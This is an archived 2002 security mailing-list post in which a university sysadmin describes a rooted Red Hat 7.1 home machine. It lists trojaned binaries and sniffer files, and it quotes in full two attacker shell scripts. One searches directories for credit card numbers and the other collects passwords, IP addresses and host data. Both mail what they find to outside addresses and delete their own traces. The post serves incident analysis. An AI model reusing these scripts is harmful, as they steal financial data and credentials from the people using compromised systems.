qestions about a rooted RH7.1 box

From: Christopher Albert (sysadminat_private)
Date: Fri Apr 12 2002 - 14:02:52 PDT

  • Next message: Andrew Daviel: "Re: <victim>server formmail.pl exploit in the wild"

    Greetings,
    One of the students here got his home box rooted last week. Before he 
    reinstalled I asked him
    to let me have a look at his box, which I could only do remotely. I took 
    a look at it yesterday for about
    twenty minutes and collected some stuff, but I had him pull it offline 
    before grave-robber and I were finished because the box seemed just too 
    poisoned and I wasn't comfortable staying connected. I have some 
    questioned about what I found, and was wondering if the tools I found 
    were from a familiar rootkit.
    
    1. Most of the attack tools were in
    
    /usr/lib/.lib :      libdi  libdu  libfh  libne  libnh  libvd
    libdi = libvd  # The 'ls' trojan
    libdu =            # The 'top' trojan
    libne =            # The 'netstat' trojan
    
    The 'ps' trojan was in : /usr/lib/libc/libp
     
    /usr/lib/sn :        *  .sys  .X
    /usr/lib/ld :         *  chat  .cv  .X
           
    .X= # Sorts the output from LinSniffer 0.03 [BETA] by Mike Edulla 
    <medullaat_private>
    and .sys was its output file.
    
    'chat' seemed to be 'chattr' which was removed from the system.
    
    .cv was the output of a script in /usr/man/.../ looking for credit card 
    numbers
    /usr/man/.../: .c .m # I'll paste these scripts at the end, since they 
    are revealing.
    
    In addition, /usr/bin/kernel seemed to be a trojan sshd , running on 
    ports 6010, 6011.
    
    The scipts .c and .m are :
    /usr/man/...
    .c
    #!/bin/bash
    hh="r0otat_private"
    egrep -ir 'mastercard|visa' /home|egrep -v cache >> /usr/lib/ld/.cv
    egrep -ir 'mastercard|visa' /var|egrep -v cache >> /usr/lib/ld/.cv
    egrep -ir 'mastercard|visa' /root|egrep -v cache >> /usr/lib/ld/.cv
    if [ -d "/www" ]; then
    egrep -ir 'mastercard|visa' /www >> /usr/lib/ld/.cv
    fi
    if [ -d "/var/www" ]; then
    egrep -ir 'mastercard|visa' /var/www >> /usr/lib/ld/.cv
    fi
    if [ -f "/usr/lib/ld/.cv" ]; then
    /sbin/ifconfig | grep inet | awk '{print $2}'| cut -d: -f2 | grep -v 
    "127.0.0." | grep -v "192.168.0." >> /usr/lib/ld/.cv
    hostname -f >> /usr/lib/ld/.cv
    cat /usr/lib/ld/.cv | mail -s "cronmonthly" $hh
    rm &> /dev/null -rf /usr/lib/ld/.cv
    fi
    rm &> /dev/null -rf /usr/man/.../.c
    #!/bin/bash
    #/usr/man/.../.m
    #
    cs="blackeyeroat_private"
    dp="/usr/lib/ld"
    db="/usr/share/rht/..."
    wd="/usr/man/.../.w
    ml="/usr/man/.../.m
    if [ -f "$dp/.i" ]; then
    cat $dp/.i >> $dp/.pw
    fi
    if [ -f "$bla2/.o" ]; then
    cat $dp/.o >> $dp/.pw
    fi
    /sbin/ifconfig | grep inet | awk '{print $2}'| cut -d: -f2 | grep -v 
    "127.0.0." | grep -v "192.168.0." >> $dp/.d
    hostname -f >> $dp/.d
    cat $dp/.pw >> $dp/.d
    if [ -f "/etc/hosts" ]; then
    cat /etc/hosts >> $dp/.d
    fi
    cat $dp/.d | mail -s "cronstate" $cs
    cat $dp/.pw >> $db/.p
    rm &> /dev/null -rf $dp/.pw $dp/.d $wd $ml
    
    Thought this might be of interest to the group.
    
    Chris
    
    -- 
    --------------------------------------------------------------------
                         Christopher Albert            
                Responsable des services informatiques
             Departement de mathematiques et de statistique
                      Universite de Montreal                       
    
               bureau 6188, Pavillon Andre-Aisenstadt
              Tel: (514) 343-2281  Fax: (514) 343-5700  
    --------------------------------------------------------------------
    									      
    
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Sun Apr 14 2002 - 14:50:29 PDT